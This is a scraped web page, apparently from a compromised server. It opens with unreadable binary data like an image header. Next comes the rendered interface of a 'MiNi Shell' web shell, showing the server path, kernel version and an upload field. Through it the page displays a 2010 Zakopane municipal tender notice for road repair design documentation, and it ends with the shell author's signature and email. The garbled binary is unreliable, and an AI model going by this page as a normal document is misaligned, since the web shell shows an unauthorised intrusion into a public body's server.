JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100127/18187-N-2010.html

<p class="kh_header"><b>Zakopane: ZP/341/87/09 wykonanie dokumentacji projektowo-kosztorysowej remontu drogi dojazdowej do SzP nr 2 w Zakopanem</b><br>
<b>Numer ogłoszenia: 18187 - 2010; data zamieszczenia: 27.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/341/87/09 wykonanie dokumentacji projektowo-kosztorysowej remontu drogi dojazdowej do SzP nr 2 w Zakopanem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie i dostarczenie dokumentacji projektowo - kosztorysowej dla zadania inwestycyjnego nr 42/08 o nazwie: Remont drogi dojazdowej do Szkoły Podstawowej nr 2 w Zakopanem wykonywany w ramach usuwania skutków powodzi w lipcu 2008r od ul. Skibówki wzdłuż Potoku Młynkowiec.
1.	Zakres przedmiotu zamówienia obejmuje:	
1.1.	sporządzenie bądź pozyskanie aktualnej mapy sytuacyjno - wysokościowej i ewidencyjnej.
1.2.	dokonanie podziału na zadania - ustalenie hierarchii zadań ze względu na charakter prac projektowych,
1.3.	dokonanie kwalifikacji przyjętych rozwiązań projektowych mających na celu ustalenie zakresu wymagającego uzyskania decyzji pozwolenia na budowę i zakresu objętego wymogiem zgłoszenia robót nie wymagających pozwolenia na budowę,
1.4.	ustalenie istniejącego przebiegu pasa drogowego,
1.5.	ustalenie projektowanego przebiegu pasa drogowego,
1.6.	wskazanie w terenie projektowanego pasa drogowego,
1.7.	porównanie istniejącego i projektowanego przebiegu pasa drogowego,
1.8.	wykonanie projektu podziału działek dla istniejącego pasa drogowego i pozyskanie wymaganych klauzul,
1.9.	wykonanie projektu podziału działek dla projektowanego pasa drogowego i pozyskanie wymaganych klauzul,
1.10.	wykonanie wykazu właścicieli nieruchomości objętych inwestycją, opartego na zapisach w księgach wieczystych a w przypadku ich braku na rejestrze gruntów,
1.11.	przygotowanie kompletnego wniosku do uzyskania decyzji WZ i jej uzyskanie w zależności od dokonanych kwalifikacji,
1.12.	przygotowanie kompletnego wniosku i uzyskanie decyzji o ustaleniu warunków środowiskowych,
1.13.	opracowanie raportu o oddziaływaniu przedsięwzięcia na środowisko jeżeli taka potrzeba wynika z decyzji o ustaleniu warunków środowiskowych,
1.14.	opracowanie projektu budowlanego ( w zależności od przyjętych kwalifikacji),
1.15.	uzyskanie wymaganych prawem stosownych uzgodnień, postanowień lub decyzji (w tym uzgodnienie dokumentacji z RZGW i pozwolenia wodno - prawnego),
1.16.	przygotowanie kompletnego wniosku do zgłoszenia robót budowlanych 
nie wymagających uzyskania pozwolenia na budowę i/lub pozwolenia na budowę na podstawie dokonanej uprzednio kwalifikacji,
1.17.	pozyskanie badań geotechnicznych stabilności skarpy, badań nawierzchni, kruszyw gruntów i ugięć sprężystych w zależności od potrzeb projektu,
1.18.	opracowanie projektu wykonawczego
1.19.	opracowanie przedmiaru robót z podaniem podstawy wycen,
1.20.	opracowanie kosztorysu inwestorskiego,
1.21.	opracowania Specyfikacji Technicznych Wykonania i Odbioru Robót na wszystkie elementy, dostosowanych do specyfiki realizowanych robót.

Zobowiązuje się  wykonawcę którego oferta zostanie uznana za najkorzystniejszą do opracowania i uzgodnienia z Zamawiającym przed zawarciem umowy harmonogramu rzeczowo finansowego uwzględniającego poszczególne elementy- etapy zamawianego zadania wyszczególnione w p. 1.(wzór harmonogramu stanowi załącznik do wzoru umowy załączonego do niniejszej siwz) 

Przyjęte przez  wykonawcę ( projektanta) założenia wstępne do projektu podlegają uzgodnieniu  Zamawiającego


2.	Forma opracowania dokumentacji:
2.1.	dokumentacja zbroszurowana (w sposób umożliwiający bezpośrednie wpięcie do segregatora biurowego) w ilości:
2.1.1	projekt  budowlany 6 szt.
2.1.2	projekt  wykonawczy 6 szt.
2.1.3	specyfikacje istotnych warunków wykonania i odbioru robót 6 szt.
2.1.4	przedmiar robót (kosztorys ślepy) 3 szt.
2.1.5	kosztorys inwestorski 3 szt.
2.2.	dokumentacja elektroniczna w formacie Word, PDF oraz dodatkowo kosztorys inwestorski i wykaz właścicieli nieruchomości objętych inwestycją w zapisie  umożliwiającym odczyt w formacie Excel.
2.3.	dokumentacja powinna być zgodna z obowiązującymi przepisami, w tym:
2.3.1	Prawem budowlanym (tekst jednolity: Dz. U. 2006 r. Nr 156, poz. 1118 
z późn. zm.),
2.3.2	Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego
( Dz U. Nr 202 poz.2072 ze zmianami ),
2.3.3	Ustawą z dnia 10.04.2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz. U. z 2003 r. Nr 80 poz. 721). 
3.	Zakres planowanego zadania obejmuje wykonanie dokumentacji projektowo-kosztorysowej przebudowy drogi wewnętrznej o długości ok. 300m, w szczególności:
3.1.	stabilizację skarpy drogi - zabezpieczenia osuwisk w sposób zaproponowany przez projektanta,
3.2.	wykonanie ewentualnego zabezpieczenia brzegów Potoku Młynkowiec,
3.3.	przebudowę istniejącej konstrukcji jezdni zapewniającej spełnienie warunków dla drogi dojazdowej przeciwpożarowej,
3.4.	przebudowę istniejących skrzyżowań i zjazdów,
3.5.	przebudowę urządzeń bezpieczeństwa ruchu,
3.6.	przebudowę lub zabezpieczeniu infrastruktury obcej, 
3.7.	przebudowę lub budowę systemu odwodnienia,
3.8.	wykonanie oznakowania poziomego i pionowego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 75.25.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Każdy wykonawca jest zobowiązany wnieść wadium przetargowe w wysokości  4.600,00   zł  ( słownie:   cztery tysiące sześćset    złotych)

2.	Wadium może być wnoszone w jednej lub w kilku  następujących formach: 
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
2) poręczeniach bankowych;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 lit. b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn.zm.).

3.	Wadium przetargowe w  pieniądzu należy wnieść  przelewem na konto Urzędu Miasta Zakopane w PEKAO S.A. w Zakopanem nr: 85124047481111000048718666 Wadium powinno znajdować się na koncie zamawiającego najpóźniej w terminie składania ofert tj. 11 lutego  2010r. do godz.  12°°
Wadium wnoszone w pozostałych formach należy złożyć w postaci oryginału, najpóźniej w terminie składania ofert tj. 11 lutego 2010r.do godz. 12°° w  Biurze  ds. zamówień publicznych pok. nr 8 /parter/.
        
  UWAGA! Nie wolno oryginałów tych dokumentów wkładać do oferty.

ZWROT WADIUM : 
1.Zamawiający zwraca wadium  wszystkim wykonawcom niezwłocznie po wyborze oferty   najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza , z zastrzeżeniem ,że  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na  
             wezwanie, o którym mowa w art. 26 ust. 3ustawy  nie złożył dokumentów lub oświadczeń, o  
            których mowa w art. 25 ust. 1 ustawy,  lub pełnomocnictw, chyba że udowodni, że wynika to z 
           przyczyn nieleżących po jego stronie. 

2.Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy który wycofał 
ofertę przed upływem terminu składania ofert;
           3. Zamawiający żąda  ponownego wniesienia wadium przez wykonawcę którym zwrócono wadium na podstawie ust.1  jeżeli w wyniku  ostatecznego rozstrzygnięcia protestu jego oferta została  wybrana jako najkorzystniejsza. Wykonawca wnosi wadium  w terminie określonym przez Zamawiającego.
     4. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku banko?wego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
    
5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O  udzielenie  zamówienia  mogą  ubiegać  się  wykonawcy,  którzy spełniają warunki, dotyczące: 
1) posiadania uprawnień do wykonywania określonej działalności lub  czynności,  jeżeli  przepisy  prawa  nakładają  obowiązek  ich posiadania; 
2) posiadania wiedzy i doświadczenia; 
3) dysponowania  odpowiednim  potencjałem  technicznym  oraz osobami zdolnymi do wykonania zamówienia; 
4)   sytuacji ekonomicznej i finansowej

oraz nie  podlegają  wykluczeniu z powodu niespełniania warunków, o których mowa w art. 24 ust. 1 ustawy.
Opis sposobu dokonywania oceny spełnienia warunków:
  Wiedza i doświadczenie: 
Warunek zostanie uznany za spełniony ,jeżeli  wykonawca wykaże , że w ciągu ostatnich 3 lat przed upływem terminu składania ofert  a jeżeli okres prowadzenia działalności jest krótszy w tym okresie świadczył  co najmniej 2 dokumentacje projektowo - kosztorysowe o zakresie odpowiadającym swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, tj. wykonaniem dokumentacji projektowo - kosztorysowej remontu, budowy lub przebudowy drogi z zabezpieczeniem stateczności skarp o długości nie mniejszej niż 0,3 km
 
Dysponowanie osobami zdolnymi do wykonania zamówienia 
Warunek zostanie uznany za spełniony ,jeżeli  wykonawca wykaże  ,że  będzie dysponował co najmniej 1 osobą  posiadającą uprawnienia do pełnienia funkcji projektanta bez ograniczeń w specjalności  drogowej i co najmniej jedną osobą  posiadającą uprawnienia budowlane w specjalności  hydrotechnicznej bez ograniczeń  lub odpowiednich   wydanych  na podstawie wcześniejszych przepisów.
Wykonawca ma wykazać ,że zapewni  do wykonania opracowań branżowych udział osób posiadających uprawnienia do pełnienia funkcji projektanta bez ograniczeń w danej specjalności lub odpowiadające im wydane na podstawie wcześniejszych przepisów łącznie z aktualnym zaświadczeniami o wpisie na listę samorządu zawodowego, a w przypadku opracowań i czynności geodezyjnych udział osób uprawnionych do ich wykonywania.

 
Dysponowanie odpowiednim  potencjałem  technicznym  
Warunek zostanie uznany za spełniony ,jeżeli  wykonawca  złoży w druku oferty stosowne oświadczenie 

Potencjał  finansowo- ekonomiczny 
   Warunek zostanie uznany za spełniony ,jeżeli  wykonawca   złoży w druku oferty stosowne oświadczenie 


Zamawiający w oparciu o przepisy ustawy Prawo zamówień publicznych informuje, że  wykonawca może polegać na wiedzy i doświadczeniu , potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 

 Ocena spełnienia powyższych warunków będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.  aktualny odpis z właściwego rejestru jeżeli odrębne przepisy wymagają wpisu do rejestru w celu wykazania   braku podstaw do wykluczenia w oparciu o art.24 ust.1 pkt. 2 ustawy, wystawionego nie  wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w  stosunku do osób fizycznych oświadczenia w zakresie art.24 ust.1 pkt.2 ustawy-  załącznik nr  1a do  siwz.

2. podpisane oświadczenie o spełnianiu warunków, stanowiący  załącznik nr 1   do  siwz,

3. podpisane oświadczenie o braku podstaw do wykluczenia Wykonawcy z postępowania na podstawie art. 24 ust.1 ustawy - stanowiące załącznik nr 1a do  siwz

  
4. na potwierdzenie wymaganego doświadczenia wykonawca zobowiązany jest załączyć do    oferty  wykaz usług  ( należy wypełnić   załącznik nr 4    do  siwz)             wykonanych w   okresie  ostatnich 3 lat przed upływem terminu składania ofert , a jeżeli okres prowadzenie działalności jest krótszy - w tym okresie  z którego będzie wynikać ,że wykonawca wykonał co najmniej 2 usługi o zakresie odpowiadającym swoim rodzajem usługom objętym zamówieniem, tj  wykonał co najmniej 2 dokumentacje projektowo - kosztorysowe remontu, budowy lub przebudowy drogi z zabezpieczeniem stateczności skarp o długości nie mniejszej niż 0,3 km

Wykonawca zobowiązany jest do powyższego wykazu załączyć dokumenty (np; referencje) potwierdzające, że podane w wykazie   usługi zostały wykonane należycie.

5.wypełniony druk oferty stanowiący załącznik nr 2 do siwz(wykonawca może złożyć ofertę na własnym formularzu, lecz jego  treść i układ muszą być zgodne z formularzem załączonym do siwz).

5. na potwierdzenie dysponowania  osobami zdolnymi do wykonania zamówienia , wykonawca ma do oferty załączyć wykaz osób które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia  i wykształcenia niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nie czynności, oraz informacji o podstawie dysponowania tymi osobami. Wykaz musi potwierdzać że wykonawca  będzie dysponował co najmniej 1 osobą  posiadającą uprawnienia do pełnienia funkcji projektanta bez ograniczeń w specjalności  drogowej i co najmniej jedną osobą  posiadającą uprawnienia budowlane w specjalności  hydrotechnicznej bez ograniczeń  lub odpowiednich   wydanych  na podstawie wcześniejszych przepisów.
Wykonawca ma wykazać ,że zapewni  do wykonania opracowań branżowych udział osób posiadających uprawnienia do pełnienia funkcji projektanta bez ograniczeń w danej specjalności lub odpowiadające im wydane na podstawie wcześniejszych przepisów łącznie z aktualnym zaświadczeniami o wpisie na listę samorządu zawodowego, a w przypadku opracowań i czynności geodezyjnych udział osób uprawnionych do ich wykonywania

Do niniejszego wykazu należy załączyć oświadczenie, że osoby , które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają  obowiązek posiadania  takich uprawnień 



Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej składa dokumenty zgodnie z przepisami Rozporządzenia  Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzaju dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226 poz. 1817) 

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt XIII -1  specyfikacji, składa dokument wystawiony w kraju , w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości;
Uwaga! Dokument, o którym  mowa  powyżej powinien  być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w miejscu zamieszkania  osoby  lub w  kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu o którym mowa  w pkt XIVppkt. ,  zastępuje się go  dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sadowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania  osoby lub kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania.
Dokumenty sporządzone w języku obcym musza być złożone wraz z tłumaczeniem na język polski.


Forma składania wymaganych  dokumentów .
1.Dokumenty  są  składane  w  oryginale  lub  kopii  poświadczonej  za  zgodność  z 
  oryginałem  przez  wykonawcę.  .
 2.  W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w 
przypadku  podmiotów,  o  których  mowa  w  §  1  ust.  2  i  3 Rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia  2009 r. w sprawie rodzajów dokumentów, jakich może  żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą  być  składane  (Dz. U. Nr 226 poz.1817 )  kopie  dokumentów  dotyczących  odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.   

3.Zamawiający  może  żądać  przedstawienia  oryginału  lub  notarialnie  poświadczonej  kopii dokumentu  wyłącznie  wtedy,   gdy  złożona  kopia  dokumentu  jest  nieczytelna  lub  budzi wątpliwości co do jej prawdziwości. 
4. Dokumenty  sporządzone  w  języku  obcym  są  składane  wraz  z  tłumaczeniem  na  język polski..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Rozwoju Lokalnego i Inwestycji  pok.21
Urząd Miasta Zakopane 
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2010 godzina 12:00, miejsce: Biuro ds zamówień publicznych pok.8
Urząd Miasta Zakopane 
ul. Kościuszki 13
34-500 Zakopane.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W oparciu o art.144 ust.1 ustawy zamawiający informuje, że:
1.	W przypadku zwłoki, z przyczyn nie leżących po stronie Wykonawcy, spowodowanej przedłużaniem się procedur administracyjnych lub przedłużającymi się uzgodnieniami Zamawiającego z właścicielami terenu przeznaczonego pod inwestycję, Zamawiający  na pisemny umotywowany wniosek wykonawcy dopuszcza przedłużenie terminu wykonania umowy w formie aneksu, z zachowaniem przepisów ustawy o finansach publicznych,
2.	Zamawiający zastrzega sobie możliwość rezygnacji z wykonania wybranych etapów harmonogramu rzeczowo-finansowego stanowiącego zał. nr 1 do umowy, których wykonanie okaże się zbędne z uwagi na zupełność dokumentacji lub niecelowe w szczególności w wypadku zmian w przepisach prawa uniemożliwiających lub w znacznym stopniu utrudniających wykonanie inwestycji, negatywnego odbioru społecznego dla danej inwestycji,
3.	Wykonawca może dokonywać zmiany kluczowych projektantów, przedstawionych w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowego kluczowego projektanta. 
4.	Wykonawca z własnej inicjatywy proponuje zmianę kluczowych projektantów 
w następujących przypadkach:
1)	śmierci, choroby lub innych zdarzeń losowych kluczowego projektanta,
2)	nie wywiązywania kluczowego projektanta z obowiązków wynikających z umowy,
3)	jeżeli zmiana kluczowego projektanta stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np. rezygnacja itp.),
5.	Zamawiający może zażądać od wykonawcy zmiany kluczowego projektanta, jeżeli uzna, że nie wykonuje on swoich obowiązków wynikających z umowy,
6.	w przypadku zmiany kluczowego projektanta, nowy kluczowy projektant musi spełniać wymagania określone dla danego projektanta.

Creat By MiNi SheLL
Email: jattceo@gmail.com